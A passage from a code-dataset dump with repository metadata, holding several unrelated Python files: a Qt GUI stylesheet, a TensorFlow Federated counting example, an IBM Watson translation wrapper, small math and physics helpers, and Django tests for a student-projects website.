        'border-color: {0:s};'.format(SecondaryDark),
        'color: {0:s};'.format(SecondaryText),
        'margin: 0px;',
        '}',
        'QMenuBar::item:selected',
        '{',
        'background-color: {0:s};'.format(Secondary),
        'color: {0:s};'.format(SecondaryText),
        '}',
        'QMenu',
        '{',
        'background-color:{0:s};'.format(PrimaryLight),
        'border-width: 2px;',
        'border-style: solid;',
        'border-color: {0:s};'.format(SecondaryDark),
        'margin: 0px;',
        '}',
        'QMenu::separator'
        '{',
        'height: 2px;'
        'background-color: {0:s};'.format(Primary),
        'margin: 0px 2px;',
        '}',
        'QMenu::icon:checked',
        '{',
        'background-color: {0:s};'.format(Secondary),
        'border-width: 1px;',
        'border-style: solid;',
        'border-color: {0:s};'.format(Primary),
        '}',
        'QMenu::item',
        '{',
        'padding: 4px 25px 4px 20px;',
        '}',
        'QMenu::item:selected',
        '{',
        'background-color: {0:s};'.format(Secondary),
        'color: {0:s};'.format(SecondaryText),
        '}',
        'QToolBox::tab',
        '{',
        'background-color: {0:s};'.format(SecondaryLight),
        'border: 2px solid #e3e3e3;',
        'padding: 5px;',
        '}',
        'QToolBox::tab:selected',
        '{',
        'background-color: {0:s};'.format(SecondaryDark),
        'color: {0:s};'.format(SecondaryText),
        'border: 2px solid #333;',
        '}',
        'QWidget#page,QWidget#page_2,QWidget#page_3',
        '{',
        # BUG FIX: property was spelled 'backgroundcolor' (no hyphen),
        # which Qt silently ignores.
        'background-color: #F0F0F0;',
        # 'background-image: url(./assets/background.jpg);',
        '}',
        'QProgressBar {',
        'border: 1px solid rgb(0,0,0);',
        'border-radius: 2px;',
        'background-color: {0:s};'.format(SecondaryLight),
        '}',
        'QProgressBar::chunk {',
        'border: 1px solid rgb(0,0,0);',
        'border-radius: 0px;',
        'background-color: {0:s};'.format(SecondaryDark),
        'width: 10px;',
        'margin: 2px;',
        '}',
        'QLabel#jLabelPicture',
        '{',
        'border-width: 2px;',
        'border-radius: 0px;',
        'border-style: solid;',
        'border-color: {0:s};'.format(SecondaryDark),
        '}',
        'QScrollBar,QScrollBar::add-line,QScrollBar::add-page,QScrollBar::sub-line,QScrollBar::sub-page',
        '{',
        'background-color: {0:s};'.format(Translucent),
        '}',
        'QScrollBar:horizontal',
        '{',
        'height: 10px;',
        '}',
        'QScrollBar:vertical',
        '{',
        'width: 10px;',
        '}',
        'QScrollBar::handle',
        '{',
        'background-color: {0:s};'.format(Translucent),
        '}',
        'QScrollBar::handle:hover',
        '{',
        'background-color: {0:s};'.format(Secondary),
        '}',
        'QScrollBar::handle:pressed',
        '{',
        'background-color: {0:s};'.format(Secondary),
        '}',
    ]
    app = QtWidgets.QApplication(sys.argv)
    # Load the bundled CJK-capable font referenced by the stylesheet.
    QFontDatabase.addApplicationFont(
        os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "Font", "wqy-microhei.ttc"))
    print('operating system: ', platform.system())
    if platform.system() == 'Windows':
        # Give the process its own taskbar identity on Windows.
        ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID("scellseg")
    gui = scellsegGui()
    app.setStyleSheet('\n'.join(sheet))
    gui.show()
    sys.exit(app.exec_())
# Launch the GUI when executed as a script.
if __name__ == "__main__":
    start_gui()
d336daa589d1898a53c01db9e10748817c7feeee | 4,066 | py | Python | tff_group_by_key_example/group_by_key_tff.py | michaeldtz/fed-dsp-examples | 781b4484242513152dcd1578470e1476b9490edf | [
"Apache-2.0"
] | null | null | null | tff_group_by_key_example/group_by_key_tff.py | michaeldtz/fed-dsp-examples | 781b4484242513152dcd1578470e1476b9490edf | [
"Apache-2.0"
] | null | null | null | tff_group_by_key_example/group_by_key_tff.py | michaeldtz/fed-dsp-examples | 781b4484242513152dcd1578470e1476b9490edf | [
"Apache-2.0"
] | 1 | 2022-02-25T11:25:30.000Z | 2022-02-25T11:25:30.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a simplest TFF program that performs a federated computation of sums.
# It defines a program that locally at the federated nodes computes a range, sums it
# and then created a federated sum across all participants.
#
#
import tensorflow as tf
import tensorflow_federated as tff
import numpy as np
import nest_asyncio
nest_asyncio.apply()
from collections import OrderedDict
from group_by_key_lib import gather_data, key_list_func
def run():
    """Run a federated group-by-key record count over two simulated clients.

    Builds the key vocabulary from client "1"'s data, wraps the local
    counting logic and the data loader as TFF computations, then performs a
    federated aggregate that sums the per-client count vectors.
    Prints the type signatures (dev aid) and the final (keys, counts) result.
    """
    # Bootstrap the key vocabulary from one client's dataset so that every
    # client counts into the same fixed-size vector.
    dataset = gather_data("1")
    key_list = key_list_func(dataset)
    key_list_t = [t.numpy() for t in key_list]

    @tf.function
    def count_by_key(ds):
        # Count occurrences of each known key in the local dataset `ds`.
        key_size = len(key_list_t)
        idx_list = tf.range(key_size, dtype=tf.int64)
        # Static table mapping key value -> position in the count vector;
        # unknown keys map to -1 (tf.one_hot then yields an all-zero row).
        key_lookup = tf.lookup.StaticHashTable(
            tf.lookup.KeyValueTensorInitializer(key_list_t, idx_list),
            default_value=-1)

        @tf.function
        def _count_keys(acummulator, values):
            # One reduce step: add a one-hot row for this record's key.
            indices = key_lookup.lookup(values["KEY"])
            onehot = tf.one_hot(indices, depth=tf.cast(key_size, tf.int32), dtype=tf.int32)
            return acummulator + onehot

        return ds.reduce(
            initial_state=tf.zeros([key_size], tf.int32),
            reduce_func=_count_keys)

    @tff.federated_computation(tff.FederatedType(tf.string, tff.CLIENTS))
    def federated_group_agg(id):
        # NOTE: `id` shadows the builtin of the same name; it is the
        # per-client string identifier placed at tff.CLIENTS.
        # wrap the used function into tff computations
        tff_gather_data_func = tff.tf_computation(gather_data, tf.string)
        # Derive the dataset type from the gather function
        tff_dataset_type = tff_gather_data_func.type_signature.result # tff.SequenceType(OrderedDict([('TRANS_ID', tf.string), ('SEND_BIC', tf.int64), ('REC_BIC', tf.int64), ('KEY', tf.int64)]))
        # continue to wrap functions
        tff_count_by_key = tff.tf_computation(count_by_key, tff_dataset_type)
        tff_key_list_func = tff.tf_computation(key_list_func, tff_dataset_type)
        # print out type signature (for dev purposes)
        print(tff_gather_data_func.type_signature)
        print(tff_count_by_key.type_signature)
        print(tff_key_list_func.type_signature)
        # Get dataset on client side
        tff_client_dataset = tff.federated_map(tff_gather_data_func, id)
        # Calculate the aggregates per client
        client_aggregates = tff.federated_map(tff_count_by_key, tff_client_dataset)

        # Start to build the aggregation function
        @tff.tf_computation()
        def build_zeros():
            # Zero vector used as the aggregation's initial accumulator.
            key_size = len(key_list_t)
            return tf.zeros([key_size], tf.int32)

        @tff.tf_computation(build_zeros.type_signature.result,build_zeros.type_signature.result)
        def accumulate(accum, delta):
            # Element-wise sum; also reused as the merge function below.
            return accum + delta

        @tff.tf_computation(accumulate.type_signature.result)
        def report(accum):
            # Pair the final counts with the key vocabulary for reporting.
            return tf.convert_to_tensor(key_list_t), accum

        aggregate = tff.federated_aggregate(
            value=client_aggregates,
            zero=build_zeros(),
            accumulate=accumulate,
            merge=accumulate,
            report=report,
        )
        # Second one to print out type signatures (for dev purposes)
        print(build_zeros.type_signature) # ( -> int32[key_size])
        print(accumulate.type_signature) # (<int32[key_size],int32[key_size]> -> int32[key_size])
        print(report.type_signature) # (int32[key_size] -> <string[K],int32[]>)
        print(aggregate.type_signature)
        return aggregate

    ## Now execute the federated
    result = federated_group_agg(["1","2"])
    print(result)
if __name__ == "__main__":
    # Allow running this module directly as a demo script.
    print("Running this in federated mode" )
    run()
| 33.327869 | 190 | 0.71938 | 0 | 0 | 0 | 0 | 2,719 | 0.668716 | 0 | 0 | 1,457 | 0.358337 |
d336f7daf1dfbab4fe94ce85a802bb39d23a2533 | 918 | py | Python | final_project/machinetranslation/translator.py | Opaso/xzceb-flask_eng_fr | 2aaa6e0efaefa618e7970470c4658cb26985bd5a | [
"Apache-2.0"
] | null | null | null | final_project/machinetranslation/translator.py | Opaso/xzceb-flask_eng_fr | 2aaa6e0efaefa618e7970470c4658cb26985bd5a | [
"Apache-2.0"
] | null | null | null | final_project/machinetranslation/translator.py | Opaso/xzceb-flask_eng_fr | 2aaa6e0efaefa618e7970470c4658cb26985bd5a | [
"Apache-2.0"
] | null | null | null | import os
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from dotenv import load_dotenv
# Read Watson credentials from the environment (populated from a local .env).
load_dotenv()
apikey= os.environ['apikey']
url= os.environ['url']
# Pinned Language Translator API version date.
VERSION= '2018-05-01'
# Single module-level client shared by the two translation helpers below.
authenticator= IAMAuthenticator(apikey)
language_translator= LanguageTranslatorV3(version=VERSION, authenticator=authenticator)
language_translator.set_service_url(url)
def englishToFrench(english_text):
    """Translate *english_text* from English to French via IBM Watson.

    Uses the module-level ``language_translator`` client and returns the
    first translation string from the service response.
    """
    response = language_translator.translate(
        text= english_text, model_id= 'en-fr').get_result()
    return response['translations'][0]['translation']
def frenchToEnglish(french_text):
    """Translate *french_text* from French to English via IBM Watson.

    Mirror image of ``englishToFrench`` using the 'fr-en' model.
    """
    raw = language_translator.translate(text= french_text, model_id= 'fr-en')
    payload = raw.get_result()
    translated = payload['translations'][0]['translation']
    return translated
| 34 | 92 | 0.8061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 93 | 0.101307 |
d33c83028d980eeb9f91ddf24085145d4792726e | 629 | py | Python | Malloc/run.py | Yanjun-Chen/Python-Tools | be3c9d3e2f2ac368c121805548c70757644e2302 | [
"MIT"
] | 1 | 2021-02-16T06:39:48.000Z | 2021-02-16T06:39:48.000Z | Malloc/run.py | Yanjun-Chen/Python-Tools | be3c9d3e2f2ac368c121805548c70757644e2302 | [
"MIT"
] | null | null | null | Malloc/run.py | Yanjun-Chen/Python-Tools | be3c9d3e2f2ac368c121805548c70757644e2302 | [
"MIT"
] | null | null | null | import trace_malloc as trace
'''trace 10 files with maximum memory allocated'''
trace.start()
# ... run your code ...
snapshot = trace.take_snapshot()
top_stats = snapshot.statistics('lineno')
print("[ Top 10 ]")
for stat in top_stats[:10]:
print(stat)
'''Backtrack the largest memory block'''
# Store 25 frames
trace.start(25)
# ... run your code ...
snapshot = trace.take_snapshot()
top_stats = snapshot.statistics('traceback')
# pick the biggest memory block
stat = top_stats[0]
print("%s memory blocks: %.1f KiB" % (stat.count, stat.size / 1024))
for line in stat.traceback.format():
print(line)
''' ''' | 17.971429 | 68 | 0.683625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 250 | 0.397456 |
d33d05aa2036a3db33dfe5549b91f4bc1ae6e12f | 770 | py | Python | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 115 | 2017-11-08T02:24:31.000Z | 2022-02-10T19:03:57.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 511 | 2017-12-05T15:23:09.000Z | 2022-02-22T19:38:43.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 35 | 2017-11-30T13:36:28.000Z | 2022-01-10T18:11:06.000Z | # coding: utf-8
from pathlib import Path
import pytest
from AxonDeepSeg.visualization.visualize import visualize_training
class TestCore(object):
    """Tests for the visualize_training helper of AxonDeepSeg."""

    def setup(self):
        """Resolve the bundled test-model directory before each test."""
        here = Path(__file__).resolve().parent          # .../test/visualization
        self.fullPath = here
        self.testPath = here.parent                     # the "test/" directory
        self.pathModel = self.testPath.joinpath(
            '__test_files__', '__test_model__', 'Model')

    def teardown(self):
        """No per-test cleanup needed."""
        pass

    # --------------visualize_training tests-------------- #
    @pytest.mark.unit
    def test_visualize_training_runs_successfully(self):
        # visualize_training must return a truthy value on success.
        assert visualize_training(str(self.pathModel))
| 24.0625 | 66 | 0.615584 | 642 | 0.833766 | 0 | 0 | 130 | 0.168831 | 0 | 0 | 202 | 0.262338 |
d33de8c495b1c5d04c26434bb941307d1b085eba | 441 | py | Python | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | from normal_forms import normal_form
import sympy
# Murdock, Normal Forms and Unfoldings of Local Dynamical Systems, Example 4.5.24
def f(x, y, z):
    """Vector field of Murdock, Example 4.5.24.

    All three components share the same full quadratic form
    q = x^2 + xy + xz + y^2 + yz + z^2, added to distinct linear parts
    6x, 2y and 3z respectively.
    """
    quad = x**2 + x * y + x * z + y**2 + y * z + z**2
    return 6 * x + quad, 2 * y + quad, 3 * z + quad
# Compute the degree-2 normal form of f at the origin.
h = normal_form(f, (0, 0, 0), 2)
# coeff of z**2 in the first component of the normal form.
# Fixed: the original used a Python-2 print *statement*, which is a syntax
# error under Python 3; the call form below works on both 2 and 3.
print(h.fun[0].coeff(h.jet.var[2]**2))
| 27.5625 | 81 | 0.512472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.217687 |
d33e1e636ee5da0369711e6dc257901496e19cc2 | 486 | py | Python | julie/physics/velocity.py | MarcelloBB/julieutils | cffba53a1561d05660c2274ce0a9485bf9e0ddcf | [
"MIT"
] | 2 | 2021-08-23T15:16:43.000Z | 2021-11-01T15:29:02.000Z | julie/physics/velocity.py | MarcelloBB/julieutils | cffba53a1561d05660c2274ce0a9485bf9e0ddcf | [
"MIT"
] | null | null | null | julie/physics/velocity.py | MarcelloBB/julieutils | cffba53a1561d05660c2274ce0a9485bf9e0ddcf | [
"MIT"
] | null | null | null |
def average_speed(s1: float, s0: float, t1: float, t0: float) -> float:
    """Average speed over a time interval.

    Computes displacement over elapsed time: (s1 - s0) / (t1 - t0).
    Raises ZeroDivisionError when t1 == t0.
    """
    delta_space = s1 - s0
    delta_time = t1 - t0
    return delta_space / delta_time
def average_acceleration(v1: float, v0: float, t1: float, t0: float) -> float:
    """Average acceleration over a time interval.

    Computes change in velocity over elapsed time: (v1 - v0) / (t1 - t0).
    Raises ZeroDivisionError when t1 == t0.
    """
    delta_velocity = v1 - v0
    delta_time = t1 - t0
    return delta_velocity / delta_time
d343f65dbd887e6c6ed96fa7058357629d64dfee | 28,858 | py | Python | projects/tests.py | DoubleCapitals/web-platform-prototype | b17a982d6e5d2231c9bc1127fe9f823ed546f36d | [
"MIT"
] | 3 | 2019-02-27T18:11:11.000Z | 2019-03-28T09:42:23.000Z | projects/tests.py | DoubleCapitals/web-platform-prototype | b17a982d6e5d2231c9bc1127fe9f823ed546f36d | [
"MIT"
] | 7 | 2019-02-28T06:29:50.000Z | 2019-04-26T05:46:41.000Z | projects/tests.py | DoubleCapitals/web-platform-prototype | b17a982d6e5d2231c9bc1127fe9f823ed546f36d | [
"MIT"
] | 5 | 2019-02-27T17:28:34.000Z | 2019-03-01T02:34:44.000Z | from django.test import TestCase, Client
from django.urls import reverse
from django.test.utils import setup_test_environment
from bs4 import BeautifulSoup
import re
import time
from projects.models import *
from projects.forms import *
# Module-level test client; appears unused here (each TestCase below builds
# or uses its own client) -- kept for backward compatibility.
client = Client()

# length of base template, used to test for empty pages
LEN_BASE = 2600
class BaseWebsiteTestCase(TestCase):
    """Smoke tests for the public pages.

    Every page must respond with HTTP 200 and render more content than the
    bare base template (LEN_BASE bytes), i.e. must not be empty.
    """

    def setUp(self):
        super()

    def _response_for(self, route):
        """GET the named route and return the response."""
        return self.client.get(reverse(route))

    def _check_loads(self, route):
        self.assertEqual(self._response_for(route).status_code, 200)

    def _check_not_empty(self, route):
        self.assertGreater(len(self._response_for(route).content), LEN_BASE)

    def test_homepage_load(self):
        self._check_loads("projects:home")

    def test_homepage_not_empty(self):
        self._check_not_empty("projects:home")

    def test_project_list_load(self):
        self._check_loads("projects:projects_list")

    def test_project_list_not_empty(self):
        self._check_not_empty("projects:projects_list")

    def test_project_students_load(self):
        self._check_loads("projects:students")

    def test_project_students_not_empty(self):
        self._check_not_empty("projects:students")

    def test_project_educators_load(self):
        self._check_loads("projects:educators")

    def test_project_educators_not_empty(self):
        self._check_not_empty("projects:educators")

    def test_project_leaders_load(self):
        self._check_loads("projects:leaders")

    def test_project_leaders_not_empty(self):
        self._check_not_empty("projects:leaders")
VERBOSE = False
class TraverseLinksTest(TestCase):
    """Crawls the site as a logged-in superuser and follows every internal
    link, failing if any reachable page returns a non-200 status."""

    def setUp(self):
        # By default, login as superuser
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD",
                       password="tompassword")
        self.client = Client()
        self.superuser = User.objects.get(username="tom")
        self.client.login(username="tom", password="tompassword")

    @classmethod
    def setUpTestData(cls):
        # Populate the database once per class: two projects, two extra
        # users, tags, and one project accepted so it is publicly linked.
        pm = OpenSUTDProjectManager()
        um = OpenSUTDUserManager()
        pm.create_project(project_uid="ACAD_00001",
                          title="OpenSUTD Web Platform",
                          caption="Sample project 1",
                          category="ACAD",
                          url="https://github.com/OpenSUTD/web-platform-prototype",
                          poster_url="https://via.placeholder.com/150",
                          featured_image="https://via.placeholder.com/150")
        um.create_user("dick", display_name="Dick Tan",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2019, pillar="ISTD")
        um.create_user("jane", display_name="Jane Tan",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2021, pillar="ESD")
        pm.create_project(project_uid="ACAD_00002",
                          title="RandomZZZZZ",
                          caption="Sample project 2",
                          category="ACAD",
                          url="https://github.com/OpenSUTD/web-platform-prototype",
                          poster_url="https://via.placeholder.com/150",
                          featured_image="https://via.placeholder.com/150")
        pm.set_project_status("ACAD_00001", "ACCEPT")
        pm.add_user_to_project("ACAD_00001", "dick")
        pm.add_user_to_project("ACAD_00001", "jane")
        pm.add_tag_to_project(
            "ACAD_00001", "rand1,rand2,education,student,policy")
        pm.add_user_to_project("ACAD_00002", "jane")
        pm.add_tag_to_project(
            "ACAD_00002", "rand1,rand2,education,student,policy")

    def test_traverse_urls(self):
        # Fill these lists as needed with your site specific URLs to check and to avoid
        to_traverse_list = ["/", "/projects/",
                            "/students/", "/educators/", "/leaders/"]
        to_avoid_list = ["javascript:history\.back()", "https://*",
                         "javascript:history\.go\(-1\)", "^mailto:.*"]
        done_list = []
        error_list = []
        # Maps each discovered URL to the page it was first found on,
        # so errors can be attributed to their source page.
        source_of_link = dict()
        for link in to_traverse_list:
            source_of_link[link] = "initial"
        (to_traverse_list, to_avoid_list, done_list, error_list, source_of_link) = \
            self.recurse_into_path(
                to_traverse_list, to_avoid_list, done_list, error_list, source_of_link)
        print("END REACHED\nStats:")
        if VERBOSE:
            print("\nto_traverse_list = " + str(to_traverse_list))
        if VERBOSE:
            print("\nto_avoid_list = " + str(to_avoid_list))
        if VERBOSE:
            print("\nsource_of_link = " + str(source_of_link))
        if VERBOSE:
            print("\ndone_list = " + str(done_list))
        print("Followed " + str(len(done_list)) + " links successfully")
        print("Avoided " + str(len(to_avoid_list)) + " links")
        if error_list:
            print("!! " + str(len(error_list)) + " error(s) : ")
            for error in error_list:
                print(str(error) + " found in page " +
                      source_of_link[error[0]])
            print("Errors found traversing links")
            assert False
        else:
            print("No errors")

    def recurse_into_path(self, to_traverse_list, to_avoid_list, done_list, error_list, source_of_link):
        """Pop one URL off *to_traverse_list*, crawl it, queue new links,
        then recurse until the traversal list is empty.
        Returns: (to_traverse_list, to_avoid_list, done_list, error_list, source_of_link)
        """
        if to_traverse_list:
            # NOTE: .pop() takes the *last* queued URL (depth-first order).
            url = to_traverse_list.pop()
            if not match_any(url, to_avoid_list):
                print("\nSurfing to " + str(url) +
                      ", discovered in " + str(source_of_link[url]))
                response = self.client.get(url, follow=True)
                if response.status_code == 200:
                    soup = BeautifulSoup(response.content, "html.parser")
                    text = soup.get_text()  # unused; kept as-is
                    # Queue every anchor target not already seen/avoided.
                    for link in soup.find_all("a"):
                        new_link = link.get("href")
                        if VERBOSE:
                            print(" Found link: " + str(new_link))
                        if match_any(new_link, to_avoid_list):
                            if VERBOSE:
                                print(" Avoiding it")
                        elif new_link in done_list:
                            if VERBOSE:
                                print(" Already done, ignoring")
                        elif new_link in to_traverse_list:
                            if VERBOSE:
                                print(" Already in to traverse list, ignoring")
                        else:
                            if VERBOSE:
                                print(
                                    " New, unknown link: Storing it to traverse later")
                            source_of_link[new_link] = url
                            to_traverse_list.append(new_link)
                    done_list.append(url)
                    if VERBOSE:
                        print("Done")
                else:
                    # Record the failure and avoid retrying this URL.
                    error_list.append((url, response.status_code))
                    to_avoid_list.append(url)
            if VERBOSE:
                print("Diving into next level")
            return self.recurse_into_path(to_traverse_list, to_avoid_list, done_list, error_list, source_of_link)
        else:
            # Nothing to traverse
            if VERBOSE:
                print("Returning to upper level")
            return to_traverse_list, to_avoid_list, done_list, error_list, source_of_link
def match_any(my_string, regexp_list):
    """Check *my_string* against every pattern in *regexp_list*.

    Returns a truthy Match object when any pattern matches at the start of
    the string, ``None`` when none do, and ``True`` when *my_string* is
    falsy (None / empty) -- a missing string is treated as matching.
    """
    if not my_string:
        # "None" as string always matches
        return True
    # Join the alternatives into a single "(p1)|(p2)|..." pattern.
    combined = "({})".format(")|(".join(regexp_list))
    return re.match(combined, my_string)
class SecuredPageTestCase(TestCase):
    """Anonymous users must be redirected (HTTP 302) away from
    authentication-only views."""

    def setUp(self):
        # One project and one user to give the secured views valid targets.
        pm = OpenSUTDProjectManager()
        pm.create_project(project_uid="ACAD_00001",
                          title="OpenSUTD Web Platform",
                          caption="Sample project 1",
                          category="ACAD",
                          url="https://github.com/OpenSUTD/web-platform-prototype",
                          poster_url="https://via.placeholder.com/150",
                          featured_image="https://via.placeholder.com/150")
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD")

    def test_auth_approval_view(self):
        url = reverse("projects:approval")
        response = self.client.get(url)
        self.assertEqual(response.status_code, 302)

    def test_auth_submit_view(self):
        url = reverse("projects:submit_new")
        response = self.client.get(url)
        self.assertEqual(response.status_code, 302)

    def test_auth_submit_reject(self):
        url = reverse("projects:reject", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 302)

    def test_auth_submit_approve(self):
        url = reverse("projects:approve", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 302)

    def test_auth_user_edit(self):
        url = reverse("projects:user_edit", args=("tom",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 302)

    def test_auth_project_edit(self):
        url = reverse("projects:project_edit", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 302)

    def test_auth_project_bypass(self):
        url = reverse("projects:project_page_bypass", args=("ACAD_00001",))
        response = self.client.get(url)
        # actually a custom 404 page
        self.assertEqual(response.status_code, 200)
class SubmissionFormTest(TestCase):
    """Validation rules of the project SubmissionForm."""

    def setUp(self):
        self.client = Client()
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD",
                       password="tompassword")
        self.client.login(username="tom", password="tompassword")

    def test_submission_form_entry(self):
        # A fully-filled form with a GitHub repo URL must validate.
        response = self.client.get(reverse("projects:submit_new"))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = SubmissionForm({"project_name": "test",
                               "caption": "test caption",
                               "category": "ACAD",
                               "featured_image": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png",
                               "github_url": "https://github.com/OpenSUTD/web-platform-prototype",
                               "poster_url": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png"})
        self.assertEqual(form.is_valid(), True)

    def test_submission_form_entry_invalid(self):
        # All-empty fields must fail validation.
        response = self.client.get(reverse("projects:submit_new"))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = SubmissionForm({"project_name": "",
                               "caption": "",
                               "category": "",
                               "featured_image": "",
                               "github_url": "",
                               "poster_url": ""})
        self.assertEqual(form.is_valid(), False)

    def test_submission_form_entry_not_github(self):
        # A repo URL outside github.com must be rejected.
        response = self.client.get(reverse("projects:submit_new"))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = SubmissionForm({"project_name": "test",
                               "caption": "test caption",
                               "category": "ACAD",
                               "featured_image": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png",
                               "github_url": "https://lolcats.com/OpenSUTD/web-platform-prototype",
                               "poster_url": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png"})
        self.assertEqual(form.is_valid(), False)
class UserProfileFormTest(TestCase):
    """Validation rules of the UserProfileForm."""

    def setUp(self):
        self.client = Client()
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD",
                       password="tompassword")
        self.client.login(username="tom", password="tompassword")

    def test_submission_form_entry(self):
        # test user can actually get to the page
        response = self.client.get(
            reverse("projects:user_edit", args=("tom",)))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = UserProfileForm({"display_name": "tom2",
                                "display_picture": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png",
                                "graduation_year": 2019,
                                "pillar": "ISTD",
                                "bio": "Hi I am Tom",
                                "contact_email": "tlkh.xms@gmail.com",
                                "personal_links": "tlkh.design"})
        self.assertEqual(form.is_valid(), True)

    def test_submission_form_entry_invalid(self):
        # Mostly-empty fields must fail validation.
        # test user can actually get to the page
        response = self.client.get(
            reverse("projects:user_edit", args=("tom",)))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = UserProfileForm({"display_name": "",
                                "display_picture": "",
                                "graduation_year": 2019,
                                "pillar": "",
                                "bio": "",
                                "contact_email": "",
                                "personal_links": ""})
        self.assertEqual(form.is_valid(), False)
class ProjectEditFormTest(TestCase):
    """Validation rules of the ProjectEditForm."""

    def setUp(self):
        self.client = Client()
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD",
                       password="tompassword")
        pm = OpenSUTDProjectManager()
        pm.create_project(project_uid="ACAD_00001",
                          title="OpenSUTD Web Platform",
                          caption="Sample project 1",
                          category="ACAD",
                          url="https://github.com/OpenSUTD/web-platform-prototype",
                          poster_url="https://via.placeholder.com/150",
                          featured_image="https://via.placeholder.com/150")
        # Project must be accepted before its edit page is reachable.
        pm.set_project_status("ACAD_00001", "ACCEPT")
        self.client.login(username="tom", password="tompassword")

    def test_submission_form_entry_invalid(self):
        # All-empty fields must fail validation.
        # test user can actually get to the page
        response = self.client.get(
            reverse("projects:project_edit", args=("ACAD_00001",)))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = ProjectEditForm({"title": "",
                                "caption": "",
                                "featured_image": "",
                                "url": "",
                                "poster_url": ""})
        self.assertEqual(form.is_valid(), False)

    def test_submission_form_entry(self):
        # A fully-filled form with a GitHub repo URL must validate.
        # test user can actually get to the page
        response = self.client.get(
            reverse("projects:project_edit", args=("ACAD_00001",)))
        self.assertEqual(response.status_code, 200)
        # test submission mechanism
        form = ProjectEditForm({"title": "lalalal",
                                "caption": "lalalal",
                                "featured_image": "lalalal.com",
                                "url": "https://github.com/OpenSUTD/web-platform-prototype",
                                "poster_url": "lalalal.com"})
        self.assertEqual(form.is_valid(), True)
class LogintoSecuredPageTestCase(TestCase):
    """Counterpart to SecuredPageTestCase: a logged-in user must reach
    (HTTP 200) the same views that redirect anonymous users."""

    def setUp(self):
        self.client = Client()
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD",
                       password="tompassword")
        pm = OpenSUTDProjectManager()
        pm.create_project(project_uid="ACAD_00001",
                          title="OpenSUTD Web Platform",
                          caption="Sample project 1",
                          category="ACAD",
                          url="https://github.com/OpenSUTD/web-platform-prototype",
                          poster_url="https://via.placeholder.com/150",
                          featured_image="https://via.placeholder.com/150")
        self.client.login(username="tom", password="tompassword")

    def test_login_approval_view(self):
        response = self.client.get(reverse("projects:approval"))
        self.assertEqual(response.status_code, 200)

    def test_login_submission_view(self):
        response = self.client.get(reverse("projects:submit_new"))
        self.assertEqual(response.status_code, 200)

    def test_login_user_edit(self):
        url = reverse("projects:user_edit", args=("tom",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)

    def test_login_project_edit(self):
        # Edit page only exists for an accepted project.
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:project_edit", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
class UserTestCase(TestCase):
    """User model fields and the public user-profile page."""

    def setUp(self):
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD")
        um.create_user("jane", display_name="Jane Tan",
